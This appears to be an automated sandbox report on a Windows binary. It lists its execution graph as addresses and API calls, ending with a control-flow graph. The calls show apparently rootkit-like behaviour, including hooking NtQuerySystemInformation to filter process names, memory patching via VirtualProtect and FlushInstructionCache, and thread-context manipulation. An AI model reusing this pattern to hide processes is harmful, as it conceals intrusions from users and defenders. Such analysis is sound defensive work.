                                                  execution_graph 8330 17d2dd5bd34 8331 17d2dd5bd4d 8330->8331 8344 17d2dd5bd49 8330->8344 8332 17d2dd5e864 56 API calls 8331->8332 8333 17d2dd5bd52 8332->8333 8345 17d2dd5edc8 GetEnvironmentStringsW 8333->8345 8336 17d2dd5bd5f 8338 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8336->8338 8337 17d2dd5bd6b 8365 17d2dd5bda8 8337->8365 8338->8344 8341 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8342 17d2dd5bd92 8341->8342 8343 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8342->8343 8343->8344 8346 17d2dd5bd57 8345->8346 8347 17d2dd5edf8 8345->8347 8346->8336 8346->8337 8348 17d2dd5ece8 WideCharToMultiByte 8347->8348 8349 17d2dd5ee49 8348->8349 8350 17d2dd5ee53 FreeEnvironmentStringsW 8349->8350 8351 17d2dd5c5d0 14 API calls 8349->8351 8350->8346 8352 17d2dd5ee63 8351->8352 8353 17d2dd5ee74 8352->8353 8354 17d2dd5ee6b 8352->8354 8356 17d2dd5ece8 WideCharToMultiByte 8353->8356 8355 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8354->8355 8357 17d2dd5ee72 8355->8357 8358 17d2dd5ee97 8356->8358 8357->8350 8359 17d2dd5ee9b 8358->8359 8360 17d2dd5eea5 8358->8360 8361 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8359->8361 8362 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8360->8362 8363 17d2dd5eea3 FreeEnvironmentStringsW 8361->8363 8362->8363 8363->8346 8366 17d2dd5bdcd 8365->8366 8367 17d2dd5d220 __std_exception_copy 13 API calls 8366->8367 8380 17d2dd5be03 8367->8380 8368 17d2dd5be0b 8369 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8368->8369 8371 17d2dd5bd73 8369->8371 8370 17d2dd5be6d 8372 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8370->8372 8371->8341 8372->8371 8373 17d2dd5d220 __std_exception_copy 13 API calls 8373->8380 8374 17d2dd5be92 8375 17d2dd5bebc 13 API calls 8374->8375 8377 
17d2dd5be9a 8375->8377 8378 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8377->8378 8378->8368 8379 17d2dd5bea6 8381 17d2dd5d06c _invalid_parameter_noinfo 17 API calls 8379->8381 8380->8368 8380->8370 8380->8373 8380->8374 8380->8379 8382 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8380->8382 8384 17d2dd5c328 8380->8384 8383 17d2dd5beb9 8381->8383 8382->8380 8385 17d2dd5c33f 8384->8385 8386 17d2dd5c335 8384->8386 8387 17d2dd5d1f4 __std_exception_copy 13 API calls 8385->8387 8386->8385 8391 17d2dd5c35a 8386->8391 8388 17d2dd5c346 8387->8388 8389 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8388->8389 8390 17d2dd5c352 8389->8390 8390->8380 8391->8390 8392 17d2dd5d1f4 __std_exception_copy 13 API calls 8391->8392 8392->8388 8532 17d2dd52ab4 TlsGetValue TlsGetValue TlsGetValue 8533 17d2dd52b0d 8532->8533 8535 17d2dd52b79 8532->8535 8533->8535 8536 17d2dd52b15 8533->8536 8534 17d2dd52b74 8535->8534 8537 17d2dd52c32 TlsSetValue TlsSetValue TlsSetValue 8535->8537 8539 17d2dd53f88 StrCmpNIW 8535->8539 8536->8534 8536->8537 8538 17d2dd53f88 StrCmpNIW 8536->8538 8537->8534 8538->8536 8539->8535 8849 17d2dd5ec30 GetCommandLineA GetCommandLineW 8850 17d2dd56430 8851 17d2dd5643d 8850->8851 8852 17d2dd56449 8851->8852 8857 17d2dd5655a 8851->8857 8853 17d2dd564cd 8852->8853 8854 17d2dd564a6 SetThreadContext 8852->8854 8854->8853 8855 17d2dd56581 VirtualProtect FlushInstructionCache 8855->8857 8856 17d2dd5663e 8858 17d2dd5665e 8856->8858 8866 17d2dd54b20 8856->8866 8857->8855 8857->8856 8870 17d2dd55530 GetCurrentProcess 8858->8870 8861 17d2dd566b7 8864 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8861->8864 8862 17d2dd56677 ResumeThread 8863 17d2dd56663 8862->8863 8863->8861 8863->8862 8865 17d2dd566ff 8864->8865 8868 17d2dd54b3c 8866->8868 8867 17d2dd54b9f 8867->8858 8868->8867 8869 17d2dd54b52 VirtualFree 8868->8869 8869->8868 8871 17d2dd5554c 8870->8871 8872 17d2dd55562 VirtualProtect FlushInstructionCache 
8871->8872 8873 17d2dd55593 8871->8873 8872->8871 8873->8863 7601 17d2dd51e3c LoadLibraryA GetProcAddress 7602 17d2dd51e62 SleepEx 7601->7602 7603 17d2dd51e6f 7601->7603 7602->7602 8540 17d2dd534b8 8541 17d2dd534e8 8540->8541 8542 17d2dd535a1 8541->8542 8543 17d2dd53505 PdhGetCounterInfoW 8541->8543 8543->8542 8544 17d2dd53523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8543->8544 8545 17d2dd5358d GetProcessHeap HeapFree 8544->8545 8546 17d2dd53555 StrCmpW 8544->8546 8545->8542 8546->8545 8548 17d2dd5356a 8546->8548 8547 17d2dd53950 12 API calls 8547->8548 8548->8545 8548->8547 8874 17d2dd5fe20 8875 17d2dd5fe4a 8874->8875 8876 17d2dd5d220 __std_exception_copy 13 API calls 8875->8876 8877 17d2dd5fe6a 8876->8877 8878 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8877->8878 8879 17d2dd5fe78 8878->8879 8880 17d2dd5fea2 8879->8880 8881 17d2dd5d220 __std_exception_copy 13 API calls 8879->8881 8882 17d2dd5fec1 InitializeCriticalSectionEx 8880->8882 8884 17d2dd5feab 8880->8884 8883 17d2dd5fe94 8881->8883 8882->8880 8885 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8883->8885 8885->8880 8886 17d2dd5f820 8889 17d2dd5f7d8 8886->8889 8894 17d2dd5c558 EnterCriticalSection 8889->8894 7604 17d2dd6479d 7607 17d2dd5af34 7604->7607 7608 17d2dd5af4e 7607->7608 7610 17d2dd5af9b 7607->7610 7608->7610 7611 17d2dd59324 7608->7611 7614 17d2dd59340 7611->7614 7613 17d2dd5932d 7613->7610 7615 17d2dd5935f GetLastError 7614->7615 7616 17d2dd59358 7614->7616 7626 17d2dd59c8c 7615->7626 7616->7613 7630 17d2dd59aac 7626->7630 7636 17d2dd59b96 TlsGetValue 7630->7636 7637 17d2dd59af0 __vcrt_InitializeCriticalSectionEx 7630->7637 7631 17d2dd59b1e LoadLibraryExW 7633 17d2dd59bbd 7631->7633 7634 17d2dd59b3f GetLastError 7631->7634 7632 17d2dd59bdd GetProcAddress 7632->7636 7633->7632 7635 17d2dd59bd4 FreeLibrary 7633->7635 7634->7637 7635->7632 7637->7631 7637->7632 7637->7636 7638 17d2dd59b61 LoadLibraryExW 7637->7638 7638->7633 7638->7637 
8393 17d2dd54320 8394 17d2dd5426d 8393->8394 8395 17d2dd542bd VirtualQuery 8394->8395 8396 17d2dd542d7 8394->8396 8397 17d2dd54322 GetLastError 8394->8397 8395->8394 8395->8396 8397->8394 8398 17d2dd5872c 8401 17d2dd590c0 8398->8401 8400 17d2dd58755 8402 17d2dd59116 8401->8402 8403 17d2dd590e1 8401->8403 8402->8400 8403->8402 8404 17d2dd5c328 __std_exception_copy 38 API calls 8403->8404 8404->8402 8572 17d2dd5aaac 8573 17d2dd5aad9 __except_validate_context_record 8572->8573 8574 17d2dd59324 _CreateFrameInfo 9 API calls 8573->8574 8575 17d2dd5aade 8574->8575 8578 17d2dd5ab38 8575->8578 8579 17d2dd5abc6 8575->8579 8586 17d2dd5ab8c 8575->8586 8576 17d2dd5ac34 8576->8586 8614 17d2dd5a22c 8576->8614 8577 17d2dd5abb3 8601 17d2dd595d0 8577->8601 8578->8577 8578->8586 8587 17d2dd5ab5a __GetCurrentState 8578->8587 8583 17d2dd5abe5 8579->8583 8608 17d2dd599cc 8579->8608 8583->8576 8583->8586 8611 17d2dd599e0 8583->8611 8585 17d2dd5acdd 8587->8585 8589 17d2dd5afb8 8587->8589 8590 17d2dd599cc Is_bad_exception_allowed 9 API calls 8589->8590 8591 17d2dd5afe7 __GetCurrentState 8590->8591 8592 17d2dd59324 _CreateFrameInfo 9 API calls 8591->8592 8597 17d2dd5b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8592->8597 8593 17d2dd5b0fb 8594 17d2dd59324 _CreateFrameInfo 9 API calls 8593->8594 8595 17d2dd5b100 8594->8595 8596 17d2dd59324 _CreateFrameInfo 9 API calls 8595->8596 8598 17d2dd5b10b __FrameHandler3::GetHandlerSearchState 8595->8598 8596->8598 8597->8593 8597->8598 8599 17d2dd599cc 9 API calls Is_bad_exception_allowed 8597->8599 8671 17d2dd599f4 8597->8671 8598->8586 8599->8597 8674 17d2dd59634 8601->8674 8603 17d2dd595ef __FrameHandler3::FrameUnwindToEmptyState 8678 17d2dd59540 8603->8678 8606 17d2dd5afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8607 17d2dd59624 8606->8607 8607->8586 8609 17d2dd59324 _CreateFrameInfo 9 API calls 8608->8609 8610 17d2dd599d5 8609->8610 8610->8583 8612 17d2dd59324 _CreateFrameInfo 9 API calls 8611->8612 8613 
17d2dd599e9 8612->8613 8613->8576 8682 17d2dd5b144 8614->8682 8616 17d2dd5a6f4 8617 17d2dd5a645 8617->8616 8657 17d2dd5a643 8617->8657 8735 17d2dd5a6fc 8617->8735 8618 17d2dd5a373 8618->8617 8630 17d2dd5a3ab 8618->8630 8620 17d2dd59324 _CreateFrameInfo 9 API calls 8621 17d2dd5a687 8620->8621 8621->8616 8626 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8621->8626 8622 17d2dd5a575 8627 17d2dd5a592 8622->8627 8629 17d2dd599cc Is_bad_exception_allowed 9 API calls 8622->8629 8622->8657 8623 17d2dd59324 _CreateFrameInfo 9 API calls 8625 17d2dd5a2da 8623->8625 8625->8621 8631 17d2dd59324 _CreateFrameInfo 9 API calls 8625->8631 8628 17d2dd5a69a 8626->8628 8634 17d2dd5a5b4 8627->8634 8627->8657 8728 17d2dd595a4 8627->8728 8628->8586 8629->8627 8630->8622 8646 17d2dd599e0 9 API calls 8630->8646 8707 17d2dd5a96c 8630->8707 8721 17d2dd5a158 8630->8721 8633 17d2dd5a2ea 8631->8633 8635 17d2dd59324 _CreateFrameInfo 9 API calls 8633->8635 8636 17d2dd5a5ca 8634->8636 8634->8657 8668 17d2dd5a6d7 8634->8668 8637 17d2dd5a2f3 8635->8637 8641 17d2dd599cc Is_bad_exception_allowed 9 API calls 8636->8641 8642 17d2dd5a5d5 8636->8642 8693 17d2dd59a0c 8637->8693 8638 17d2dd59324 _CreateFrameInfo 9 API calls 8640 17d2dd5a6dd 8638->8640 8643 17d2dd59324 _CreateFrameInfo 9 API calls 8640->8643 8641->8642 8645 17d2dd5b1dc 9 API calls 8642->8645 8647 17d2dd5a6e6 8643->8647 8648 17d2dd5a5eb 8645->8648 8646->8630 8650 17d2dd5c2f4 14 API calls 8647->8650 8652 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8648->8652 8648->8657 8649 17d2dd59324 _CreateFrameInfo 9 API calls 8651 17d2dd5a335 8649->8651 8650->8616 8651->8618 8654 17d2dd59324 _CreateFrameInfo 9 API calls 8651->8654 8653 17d2dd5a605 8652->8653 8732 17d2dd59838 RtlUnwindEx 8653->8732 8656 17d2dd5a341 8654->8656 8658 17d2dd59324 _CreateFrameInfo 9 API calls 8656->8658 8657->8620 8660 17d2dd5a34a 8658->8660 8696 17d2dd5b1dc 8660->8696 8664 17d2dd5a35e 8703 17d2dd5b2cc 8664->8703 8666 17d2dd5a6d1 8667 17d2dd5c2f4 14 API calls 
8666->8667 8667->8668 8668->8638 8669 17d2dd5a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8669->8666 8670 17d2dd59178 Concurrency::cancel_current_task 2 API calls 8669->8670 8670->8666 8672 17d2dd59324 _CreateFrameInfo 9 API calls 8671->8672 8673 17d2dd59a02 8672->8673 8673->8597 8677 17d2dd59662 __FrameHandler3::FrameUnwindToEmptyState 8674->8677 8675 17d2dd596d4 8675->8603 8676 17d2dd5968c RtlLookupFunctionEntry 8676->8677 8677->8675 8677->8676 8679 17d2dd59560 8678->8679 8680 17d2dd5958b 8678->8680 8679->8680 8681 17d2dd59324 _CreateFrameInfo 9 API calls 8679->8681 8680->8606 8681->8679 8683 17d2dd5b169 __FrameHandler3::FrameUnwindToEmptyState 8682->8683 8684 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8683->8684 8685 17d2dd5b17e 8684->8685 8747 17d2dd59db4 8685->8747 8688 17d2dd5b1b3 8690 17d2dd59db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8688->8690 8689 17d2dd5b190 __FrameHandler3::GetHandlerSearchState 8750 17d2dd59dec 8689->8750 8691 17d2dd5a28e 8690->8691 8691->8616 8691->8618 8691->8623 8694 17d2dd59324 _CreateFrameInfo 9 API calls 8693->8694 8695 17d2dd59a1a 8694->8695 8695->8616 8695->8649 8698 17d2dd5b2c3 8696->8698 8702 17d2dd5b207 8696->8702 8697 17d2dd5a35a 8697->8618 8697->8664 8699 17d2dd599e0 9 API calls 8699->8702 8700 17d2dd599cc Is_bad_exception_allowed 9 API calls 8700->8702 8701 17d2dd5a96c 9 API calls 8701->8702 8702->8697 8702->8699 8702->8700 8702->8701 8705 17d2dd5b2e9 Is_bad_exception_allowed 8703->8705 8706 17d2dd5b339 8703->8706 8704 17d2dd599cc 9 API calls Is_bad_exception_allowed 8704->8705 8705->8704 8705->8706 8706->8669 8708 17d2dd5aa28 8707->8708 8709 17d2dd5a999 8707->8709 8708->8630 8710 17d2dd599cc Is_bad_exception_allowed 9 API calls 8709->8710 8711 17d2dd5a9a2 8710->8711 8711->8708 8712 17d2dd599cc Is_bad_exception_allowed 9 API calls 8711->8712 8713 17d2dd5a9bb 8711->8713 8712->8713 8713->8708 8714 17d2dd5a9e7 8713->8714 8715 17d2dd599cc Is_bad_exception_allowed 9 API calls 8713->8715 8716 17d2dd599e0 9 
API calls 8714->8716 8715->8714 8717 17d2dd5a9fb 8716->8717 8717->8708 8718 17d2dd5aa14 8717->8718 8719 17d2dd599cc Is_bad_exception_allowed 9 API calls 8717->8719 8720 17d2dd599e0 9 API calls 8718->8720 8719->8718 8720->8708 8722 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8721->8722 8723 17d2dd5a195 8722->8723 8724 17d2dd599cc Is_bad_exception_allowed 9 API calls 8723->8724 8725 17d2dd5a1cd 8724->8725 8726 17d2dd59838 9 API calls 8725->8726 8727 17d2dd5a211 8726->8727 8727->8630 8729 17d2dd595b8 __FrameHandler3::FrameUnwindToEmptyState 8728->8729 8730 17d2dd59540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8729->8730 8731 17d2dd595c2 8730->8731 8731->8634 8733 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8732->8733 8734 17d2dd59932 8733->8734 8734->8657 8736 17d2dd5a735 8735->8736 8740 17d2dd5a948 8735->8740 8737 17d2dd59324 _CreateFrameInfo 9 API calls 8736->8737 8738 17d2dd5a73a 8737->8738 8739 17d2dd5a759 EncodePointer 8738->8739 8745 17d2dd5a7ac 8738->8745 8741 17d2dd59324 _CreateFrameInfo 9 API calls 8739->8741 8740->8657 8742 17d2dd5a769 8741->8742 8742->8745 8753 17d2dd594ec 8742->8753 8744 17d2dd5a158 19 API calls 8744->8745 8745->8740 8745->8744 8746 17d2dd599cc 9 API calls Is_bad_exception_allowed 8745->8746 8746->8745 8748 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8747->8748 8749 17d2dd59dc7 8748->8749 8749->8688 8749->8689 8751 17d2dd59634 __SetUnwindTryBlock RtlLookupFunctionEntry 8750->8751 8752 17d2dd59e06 8751->8752 8752->8691 8754 17d2dd59324 _CreateFrameInfo 9 API calls 8753->8754 8755 17d2dd59518 8754->8755 8755->8745 7639 17d2dd60fa8 7640 17d2dd60fcc 7639->7640 7643 17d2dd58070 7640->7643 7644 17d2dd58079 7643->7644 7645 17d2dd58084 7644->7645 7646 17d2dd58848 IsProcessorFeaturePresent 7644->7646 7647 17d2dd58860 7646->7647 7652 17d2dd5891c RtlCaptureContext 7647->7652 7653 17d2dd58936 RtlLookupFunctionEntry 7652->7653 7654 17d2dd5894c RtlVirtualUnwind 7653->7654 7655 17d2dd58873 7653->7655 7654->7653 
7654->7655 7656 17d2dd58814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7655->7656 7657 17d2dd533a8 7658 17d2dd533cf 7657->7658 7659 17d2dd5349c 7658->7659 7660 17d2dd533ec PdhGetCounterInfoW 7658->7660 7660->7659 7661 17d2dd5340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 7660->7661 7662 17d2dd53440 StrCmpW 7661->7662 7663 17d2dd53488 GetProcessHeap HeapFree 7661->7663 7662->7663 7665 17d2dd53455 7662->7665 7663->7659 7665->7663 7666 17d2dd53950 StrCmpNW 7665->7666 7667 17d2dd53982 StrStrW 7666->7667 7668 17d2dd539f2 7666->7668 7667->7668 7669 17d2dd5399b StrToIntW 7667->7669 7668->7665 7669->7668 7670 17d2dd539c3 7669->7670 7670->7668 7676 17d2dd51a30 OpenProcess 7670->7676 7675 17d2dd51cfc 2 API calls 7675->7668 7677 17d2dd51a64 K32GetModuleFileNameExW 7676->7677 7678 17d2dd51ab6 7676->7678 7679 17d2dd51a7e PathFindFileNameW lstrlenW 7677->7679 7680 17d2dd51aad CloseHandle 7677->7680 7678->7668 7682 17d2dd53f88 7678->7682 7679->7680 7681 17d2dd51a9c StrCpyW 7679->7681 7680->7678 7681->7680 7683 17d2dd539e4 7682->7683 7684 17d2dd53f95 StrCmpNIW 7682->7684 7683->7668 7683->7675 7684->7683 8895 17d2dd5c828 8896 17d2dd5c82d 8895->8896 8900 17d2dd5c842 8895->8900 8901 17d2dd5c848 8896->8901 8902 17d2dd5c88a 8901->8902 8905 17d2dd5c892 8901->8905 8903 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8902->8903 8903->8905 8904 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8906 17d2dd5c89f 8904->8906 8905->8904 8907 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8906->8907 8908 17d2dd5c8ac 8907->8908 8909 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8908->8909 8910 17d2dd5c8b9 8909->8910 8911 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8910->8911 8912 17d2dd5c8c6 8911->8912 8913 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8912->8913 8914 17d2dd5c8d3 8913->8914 
[Execution graph residue: a flattened call-graph node and edge listing (node id, code address, resolved symbol, edge source->target) that the sandbox renders as an interactive graph; the node/edge data is not reproduced here. Windows API names visible in this part of the graph: EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, FlsGetValue, FlsSetValue, GetLastError, SetLastError, GetProcessHeap, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetFileType, GetFinalPathNameByHandleW, StrCmpNIW, StrCmpIW, StrCmpW, StrCpyW, StrCatW, PathCombineW, lstrlenW, FindFirstFileExW, FindNextFileW, FindClose, RaiseException, RtlPcToFileHeader, RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, SleepEx, GetModuleFileNameW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, VirtualProtect, VirtualQuery, VirtualAlloc, VirtualFree, GetModuleHandleA, GetProcAddress, FreeLibrary, CloseHandle, GetThreadContext, SetThreadContext, FlushInstructionCache, ResumeThread. The remaining nodes are C runtime internals (for example __std_exception_copy, _CreateFrameInfo, __CxxCallCatchBlock, _invalid_parameter_noinfo, Concurrency::details::SchedulerProxy::DeleteThis).]
17d2dd639a1 8279->8280 8287 17d2dd5c2f4 8280->8287 8286 17d2dd58cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8283->8286 8284 17d2dd58dd1 8284->8275 8284->8277 8285 17d2dd58d94 RtlUnwindEx 8285->8286 8286->8284 8286->8285 8288 17d2dd5cab0 _invalid_parameter_noinfo 14 API calls 8287->8288 8289 17d2dd5c2fd 8288->8289 8472 17d2dd606e0 8473 17d2dd606e9 8472->8473 8477 17d2dd606f9 8472->8477 8474 17d2dd5d1f4 __std_exception_copy 13 API calls 8473->8474 8475 17d2dd606ee 8474->8475 8476 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8475->8476 8476->8477 8290 17d2dd57f60 8291 17d2dd57f81 8290->8291 8292 17d2dd57f7c 8290->8292 8294 17d2dd58090 8292->8294 8295 17d2dd580b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8294->8295 8296 17d2dd58127 8294->8296 8295->8296 8296->8291 8830 17d2dd6485e 8831 17d2dd59324 _CreateFrameInfo 9 API calls 8830->8831 8832 17d2dd6486c 8831->8832 8833 17d2dd64877 8832->8833 8834 17d2dd59324 _CreateFrameInfo 9 API calls 8832->8834 8834->8833 9277 17d2dd5b7ea 9278 17d2dd5c2f4 14 API calls 9277->9278 9279 17d2dd5b7ef 9278->9279 9280 17d2dd5b85f 9279->9280 9281 17d2dd5b815 GetModuleHandleW 9279->9281 9294 17d2dd5b6f8 9280->9294 9281->9280 9285 17d2dd5b822 9281->9285 9285->9280 9289 17d2dd5b904 GetModuleHandleExW 9285->9289 9290 17d2dd5b94a 9289->9290 9291 17d2dd5b938 GetProcAddress 9289->9291 9292 17d2dd5b962 9290->9292 9293 17d2dd5b95b FreeLibrary 9290->9293 9291->9290 9292->9280 9293->9292 9306 17d2dd5c558 EnterCriticalSection 9294->9306 9307 17d2dd527e8 9309 17d2dd52867 9307->9309 9308 17d2dd52998 9309->9308 9310 17d2dd528c9 GetFileType 9309->9310 9311 17d2dd528ed 9310->9311 9312 17d2dd528d7 StrCpyW 9310->9312 9314 17d2dd51ad4 4 API calls 9311->9314 9313 17d2dd528fc 9312->9313 9317 17d2dd5299d 9313->9317 9319 17d2dd52906 9313->9319 9314->9313 9315 17d2dd53f88 StrCmpNIW 9315->9317 9316 17d2dd53f88 StrCmpNIW 9316->9319 9317->9308 9317->9315 9318 17d2dd53708 4 API 
calls 9317->9318 9320 17d2dd51dd4 2 API calls 9317->9320 9318->9317 9319->9308 9319->9316 9321 17d2dd53708 4 API calls 9319->9321 9322 17d2dd51dd4 2 API calls 9319->9322 9320->9317 9321->9319 9322->9319 9323 17d2dd64611 __scrt_dllmain_exception_filter 8835 17d2dd55c8d 8837 17d2dd55c94 8835->8837 8836 17d2dd55cfb 8837->8836 8838 17d2dd55d77 VirtualProtect 8837->8838 8839 17d2dd55db1 8838->8839 8840 17d2dd55da3 GetLastError 8838->8840 8840->8839 8481 17d2dd5c510 8482 17d2dd5c518 8481->8482 8483 17d2dd5c545 8482->8483 8485 17d2dd5c574 8482->8485 8486 17d2dd5c59f 8485->8486 8487 17d2dd5c582 DeleteCriticalSection 8486->8487 8488 17d2dd5c5a3 8486->8488 8487->8486 8488->8483 8297 17d2dd61398 8298 17d2dd613ae 8297->8298 8299 17d2dd613f5 8298->8299 8301 17d2dd6140e 8298->8301 8300 17d2dd5d1f4 __std_exception_copy 13 API calls 8299->8300 8302 17d2dd613fa 8300->8302 8303 17d2dd5dd78 14 API calls 8301->8303 8305 17d2dd61405 8301->8305 8304 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8302->8304 8303->8305 8304->8305 8489 17d2dd52518 GetProcessIdOfThread GetCurrentProcessId 8490 17d2dd52543 CreateFileW 8489->8490 8491 17d2dd525be 8489->8491 8490->8491 8492 17d2dd52577 WriteFile ReadFile CloseHandle 8490->8492 8492->8491 9324 17d2dd5c218 9325 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9324->9325 9326 17d2dd5c228 9325->9326 9327 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9326->9327 9328 17d2dd5c23c 9327->9328 9329 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9328->9329 9330 17d2dd5c250 9329->9330 9331 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9330->9331 9332 17d2dd5c264 9331->9332 7571 17d2dd52300 NtQuerySystemInformation 7572 17d2dd5233c 7571->7572 7573 17d2dd52355 7572->7573 7574 17d2dd52447 7572->7574 7584 17d2dd52412 7572->7584 7579 17d2dd5238d StrCmpNIW 7573->7579 7582 17d2dd523b4 7573->7582 7573->7584 7575 17d2dd5244c 7574->7575 7576 17d2dd524bb 
7574->7576 7591 17d2dd535c8 GetProcessHeap HeapAlloc 7575->7591 7578 17d2dd524c0 7576->7578 7576->7584 7580 17d2dd535c8 11 API calls 7578->7580 7579->7573 7583 17d2dd52464 7580->7583 7582->7573 7585 17d2dd51d30 7582->7585 7583->7584 7586 17d2dd51db4 7585->7586 7587 17d2dd51d57 GetProcessHeap HeapAlloc 7585->7587 7586->7582 7587->7586 7588 17d2dd51d92 7587->7588 7597 17d2dd51cfc 7588->7597 7596 17d2dd5361b 7591->7596 7592 17d2dd536d9 GetProcessHeap HeapFree 7592->7583 7593 17d2dd536d4 7593->7592 7594 17d2dd53666 StrCmpNIW 7594->7596 7595 17d2dd51d30 6 API calls 7595->7596 7596->7592 7596->7593 7596->7594 7596->7595 7598 17d2dd51d13 7597->7598 7599 17d2dd51d1c GetProcessHeap HeapFree 7597->7599 7600 17d2dd51530 2 API calls 7598->7600 7599->7586 7600->7599 8306 17d2dd5c180 8309 17d2dd5bf38 8306->8309 8316 17d2dd5bf00 8309->8316 8317 17d2dd5bf10 8316->8317 8318 17d2dd5bf15 8316->8318 8319 17d2dd5bebc 13 API calls 8317->8319 8320 17d2dd5bf1c 8318->8320 8319->8318 8321 17d2dd5bf31 8320->8321 8322 17d2dd5bf2c 8320->8322 8324 17d2dd5bebc 8321->8324 8323 17d2dd5bebc 13 API calls 8322->8323 8323->8321 8325 17d2dd5bec1 8324->8325 8326 17d2dd5bef2 8324->8326 8327 17d2dd5beea 8325->8327 8328 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8325->8328 8329 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8327->8329 8328->8325 8329->8326 8493 17d2dd5b500 8498 17d2dd5c558 EnterCriticalSection 8493->8498 8499 17d2dd58f0c 8506 17d2dd5946c 8499->8506 8502 17d2dd58f19 8507 17d2dd59474 8506->8507 8509 17d2dd594a5 8507->8509 8510 17d2dd58f15 8507->8510 8523 17d2dd59d28 8507->8523 8511 17d2dd594b4 __vcrt_uninitialize_locks DeleteCriticalSection 8509->8511 8510->8502 8512 17d2dd59400 8510->8512 8511->8510 8528 17d2dd59bfc 8512->8528 8524 17d2dd59aac __vcrt_InitializeCriticalSectionEx 5 API calls 8523->8524 8525 17d2dd59d5e 8524->8525 8526 17d2dd59d73 InitializeCriticalSectionAndSpinCount 8525->8526 8527 17d2dd59d68 8525->8527 8526->8527 
8527->8507 8529 17d2dd59aac __vcrt_InitializeCriticalSectionEx 5 API calls 8528->8529 8530 17d2dd59c21 TlsAlloc 8529->8530 9333 17d2dd5820c 9340 17d2dd58f34 9333->9340 9336 17d2dd58219 9341 17d2dd59340 _CreateFrameInfo 9 API calls 9340->9341 9342 17d2dd58215 9341->9342 9342->9336 9343 17d2dd5c288 9342->9343 9344 17d2dd5cb10 __std_exception_copy 13 API calls 9343->9344 9345 17d2dd58222 9344->9345 9345->9336 9346 17d2dd58f48 9345->9346 9349 17d2dd592dc 9346->9349 9348 17d2dd58f51 9348->9336 9350 17d2dd592ed 9349->9350 9351 17d2dd59302 9349->9351 9352 17d2dd59c8c _CreateFrameInfo 6 API calls 9350->9352 9351->9348 9353 17d2dd592f2 9352->9353 9355 17d2dd59cd4 9353->9355 9356 17d2dd59aac __vcrt_InitializeCriticalSectionEx 5 API calls 9355->9356 9357 17d2dd59d02 9356->9357 9358 17d2dd59d14 TlsSetValue 9357->9358 9359 17d2dd59d0c 9357->9359 9358->9359 9359->9351

Control-flow Graph (rendered graph; basic-block list omitted). Function 17d2dd52300-17d2dd52517: NtQuerySystemInformation at entry (17d2dd52300-17d2dd5233a); StrCmpNIW inside the entry-walking loop at 17d2dd5238d; subcalls 17d2dd535c8 (from 17d2dd5244c and 17d2dd524c0), 17d2dd51cc4 (from 17d2dd523a7) and 17d2dd51d30 (from 17d2dd523b4); every path exits through 17d2dd524f7-17d2dd52517.
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL ref: 0000017D2DD5232B
                                                  • StrCmpNIW.SHLWAPI ref: 0000017D2DD5239A
